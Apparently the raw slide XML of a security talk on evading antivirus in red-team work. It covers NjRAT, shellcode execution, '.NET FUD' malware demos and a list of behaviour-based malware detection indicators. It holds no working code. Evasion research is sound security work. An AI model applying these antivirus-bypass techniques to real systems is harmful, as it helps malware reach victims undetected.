              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="854221" y="3496518"/>
            <a:ext cx="2344615" cy="949286"/>
          </a:xfrm>
          <a:prstGeom prst="bracePair">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="1270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C/C++ container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36E41F4-A607-BE43-A938-1BD4FF66E50B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="573660" y="4430875"/>
            <a:ext cx="3760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Execute the shellcode with fake resources within the project</a:t>
            </a:r>
            <a:endParaRPr lang="en-NL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E8B5A00-690D-5240-AADF-0BA4B8F2C96C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4733716" y="5929085"/>
            <a:ext cx="108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Clean.exe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3593A876-B2B1-8E42-BF42-92AC00869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774" y="4788395"/>
            <a:ext cx="1218580" cy="1218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B72C9FE-F1C0-3E40-B7CE-1CAE53FFCE46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2831123" y="5186363"/>
            <a:ext cx="1915651" cy="457049"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="1778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2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D55AB405-03DC-C54A-8F1F-BC3F6D194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98" y="5519437"/>
            <a:ext cx="1087221" cy="58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7218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mo.mp4" descr="demo.mp4">
            <a:hlinkClick r:id="" action="ppaction://media"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00415C67-61AA-1444-A3C2-D3758AC32C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6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5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27945-3563-8D46-9EA5-6F511C181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Disclaimer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5B988-8010-0E4E-ACD0-DBC41A3C49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All the contents of this talk are meant for education purposes (ONLY) and it’s been created as a part of Cybersecurity research.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We don't hold any responsibility whatsoever of using the contents of this research.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We have nothing against the vendors mentioned in this research and we’ve only mentioned them as part of our research without any offense or violations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7E867BA-E220-E742-A37F-681AF66B4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366" y="5701621"/>
            <a:ext cx="1776913" cy="950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371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3043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3D7A77-7AA1-5645-94B9-ECB9114E5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" y="589086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Red teaming Vs Real world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F2CEB5D-D1E2-CF49-B434-F987484940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862637"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1233660" y="364587"/>
          <a:ext cx="9724681" cy="5235798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5112339">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2705885203"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4612342">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2476576073"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="900613">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-NL" sz="2600" b="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Red Teaming</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="371132" marR="222679" marT="222679" marB="22267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L" sz="2600" b="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Real World</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="371132" marR="222679" marT="222679" marB="222679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noFill/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636B68">
                        <a:alpha val="69804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486159"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="900613"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chemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Don't care about persistence</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-NL" sz="2600" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="371132" marR="222679" marT="222679" marB="22267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600" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Persistence is crucial </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-NL" sz="2600" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="371132" marR="222679" marT="222679" marB="222679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6485773"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1296487">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-NL" sz="2600" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>It’s over when taking DA</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="371132" marR="222679" marT="222679" marB="222679">
                    <a:lnL w="12700" cmpd="sng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600">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>I</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-NL" sz="2600">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>t’s never over and always updated</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="371132" marR="222679" marT="222679" marB="222679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878E8B">
                        <a:alpha val="30196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8180015"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1296487">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-NL" sz="2600" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Leaves traces to test the blue team</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="371132" marR="222679" marT="222679" marB="22267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L" sz="2600" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Avoid getting discovered and tracked</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="371132" marR="222679" marT="222679" marB="222679">
                    <a:lnL w="38100" cap="flat" cmpd="sng" algn="ctr">
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF"/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4601421"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="660706">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-NL" sz="2600" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>No data breach impact</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="371132" marR="222679" marT="222679" marB="222679">
                    <a:lnL w="38100" cap="flat" cmpd="sng" algn="ctr">
                      <a:noFill/>
                      <a:prstDash val="soli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NL" sz="2600" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r>
                      <a:endParaRPr lang="en-NL" sz="2600" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="371132" marR="222679" marT="222679" marB="222679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878E8B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1495238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EE77CF41-ABB6-B549-9529-CC175BA31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76" y="5788394"/>
            <a:ext cx="1392168" cy="74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7240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1943A-E6D1-F346-BF2C-14D39D875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982" y="154261"/>
            <a:ext cx="10911840" cy="6400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dirty="0"/>
              <a:t>Yara everywhere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0829CA01-F4D6-E84B-8792-DD6863BAD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2" b="7348"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="640080" y="903127"/>
            <a:ext cx="10911840" cy="483679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E65671AD-0361-DA43-BFFE-52F587DC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" y="848734"/>
            <a:ext cx="10911839" cy="4945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E118B03-31F3-1142-ADE7-7B8233349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79" y="5954873"/>
            <a:ext cx="1163596" cy="62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616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86F138-E965-EA47-B828-298CEED8A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07" y="1244405"/>
            <a:ext cx="4232187" cy="4299284"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="6800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Behavior</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="6800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Analysis Malware Detection</a:t>
            </a:r>
            <a:endParaRPr lang="en-NL" sz="6800" dirty="0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67633D1-6EE6-4118-B9F0-B363477BE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1450655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D7FFC6-42A9-49CB-B5E9-B3F6B0383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014141" y="5408571"/>
            <a:ext cx="393203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FCA5AC-F04E-2146-B812-4BF6D6A88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8608" y="1244405"/>
            <a:ext cx="5008901" cy="4571972"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Any attempt to discover a sandbox environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Disabling anti-virus or other security controls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Modifying the boot record or other initialization files to alter boot-up</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Installing rootkits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Registering for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1700" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>autostart</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1700" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Shutting down or disabling system services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Downloading and installing unknown software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Deleting, altering, or adding system files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Modifying other executable programs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Connecting with known malicious sites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Encrypting files that are unrelated to the program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Adding or modifying user accounts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dynamic code building to enhance evasion capabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Executing a dropped file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Spawning </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1700" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Powershells</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1700" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Performing any actions that are highly abnormal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-NL" sz="1700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7E7414D-4E7C-2148-806B-CFCDD18A1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78" y="5816377"/>
            <a:ext cx="1509284" cy="80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767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427ABCA3-310E-924D-81BB-E1159DC13E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8444" b="-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EEB495-3539-EF4D-84E6-4EC14ED23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314688" cy="2900518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 err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NjRAT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Vs The World!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="AutoShape 2" descr="geographic distribution of njRat">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{041FDA53-6891-4AB6-91B1-0B510C3510B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791200" y="3124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6" name="AutoShape 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D456EF44-FBFE-40D6-9183-CFF8488FA2B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1" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A7533DC-1B67-B248-9681-F4E37F7193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44" y="6040519"/>
            <a:ext cx="1018630" cy="54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6998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84CB49-DA2F-9845-900C-FED9F53FF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NL">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.Net FUD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89ABA32-5A25-4227-807B-24605819C1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54802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" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F4F60B1-1045-AC42-A3FD-F5300049E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02" y="6081141"/>
            <a:ext cx="1052084" cy="56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3579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6DE84-3331-934F-83AD-C10FCB1F7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1275" y="2766218"/>
            <a:ext cx="5249449" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FUD using .NET DEMO</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3621097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mo.net.mp4" descr="demo.net.mp4">
            <a:hlinkClick r:id="" action="ppaction://media"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A4B9455-A530-5E4D-8217-316DAA870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23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11396-D90E-8848-9776-84237231C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Conclusions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>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D7FD9-0C10-204E-BAC8-BCBBFC6F1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If the AV detects a signature, that means millions/thousands  of victims got compromised.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bypassing Signature-based detection is not a difficult task </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>When it comes to running executables on your client environment (make sure you know what you are doing).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Follow us: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</a:rPr>
              <a:t>        @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jameel_nabbo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Linkedin.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/in/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eslammohamedreda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5115A2-C091-FD48-AF02-43459C241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010410"/>
            <a:ext cx="782877" cy="782877"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9222" name="Picture 6" descr="Linkedin PNG Transparent Background, Free Download #31476 ...">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DEE98CC-395E-B54E-8ABF-8E15685E82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937" y="5141933"/>
            <a:ext cx="520430" cy="51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F6AD52-802E-BE4B-A7CE-AFBD97BC9850}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="935955" y="6222088"/>
            <a:ext cx="100447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dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>bufferoverflows.net/the-art-of-bypassing-endpoint-protections-for-red-teaming-engagements/</a:t>
            </a:r>
            <a:endParaRPr lang="en-NL" sz="2000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029E599B-57EA-044C-AB45-5241AA776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917" y="5823473"/>
            <a:ext cx="918269" cy="49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2907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DF2A0-1F74-DB42-B22D-50B3D73EC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References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DD23F6-761D-834F-BA95-3BC7D29A39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hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.foregenix.com/blog/penetration-testing-the-quest-for-fully-undetectable-malware</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://cybersecurity.att.com/blogs/labs-research/malware-exploring-mutex-objects#:~:text=December%2028%2C%202009%20%7C%20Jaime%20Blasco,to%20share%20the%20same%20resource.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://attack.mitre.org/techniques/T1055/012/</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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78027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8970B-ED8C-6045-B80B-F8E418DAC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2640" y="0"/>
            <a:ext cx="5662961" cy="1325563"/>
          </a:xfrm>
        </p:spPr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About Us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9218CE0-71E7-474A-AA86-AA3F308035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4323"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="838200" y="1916036"/>
          <a:ext cx="10993244" cy="4480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96622">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3485039683"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="5496622">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2415151653"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="2263954">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/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NL" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Jameel Nabbo</a:t>
                      </a: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NL" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Principal offensive security consult</a:t>
                      </a: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lang="en-NL" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>nt</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-NL" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>@Capgemini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NL" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Eslam Reda </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/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pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="91440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NL" dirty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en-NL" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Offensive security consult</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>a</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-NL" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>nt</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-NL" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>@Capgemini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8511859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30A9DACA-C806-4A40-B383-5A6DD1DA90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35" y="844666"/>
            <a:ext cx="3989064" cy="398906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018502BE-7C20-4C15-A343-56849CBF0E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7183" y="842618"/>
            <a:ext cx="4134677" cy="41457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38F354-FAA8-904A-933A-8E3E968D98E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4852640" y="6488668"/>
            <a:ext cx="2113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bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BufferOverFlows.net</a:t>
            </a:r>
            <a:endParaRPr lang="en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4017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A4986-4788-CF48-B852-9E6DB8321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DD521-8BBA-3644-BBA4-330960231F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Issues with Red Teaming engagements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Evasion Tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Things about malware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> development</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stuff about windows API</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Powershelling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 err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Shellcoding</a:t>
            </a:r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chemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bypassing AVs using .NET</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1136914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2EFA7-0E36-A04A-A931-D2FE41B53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423" y="200434"/>
            <a:ext cx="10515600" cy="1325563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Antivirus can break you in the engagement</a:t>
            </a:r>
            <a:endParaRPr lang="en-NL" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1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B4F7FFD-44B9-C943-B1A7-CB7C38C07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2846" y="2324361"/>
            <a:ext cx="1366057" cy="163841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76DCB2-3661-2945-91C3-68933EDEE943}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685565" y="4063331"/>
            <a:ext cx="108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</a:rPr>
              <a:t>Red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D296C-7A7B-0243-BD94-80BB797DF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9392" y="2358577"/>
            <a:ext cx="1680308" cy="1680308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0998427-DF56-1340-8846-689A4C9F5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422" y="2593731"/>
            <a:ext cx="835269" cy="83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39FC7AF-C13A-DE4B-85BF-10BA0EDABB3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="2052" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
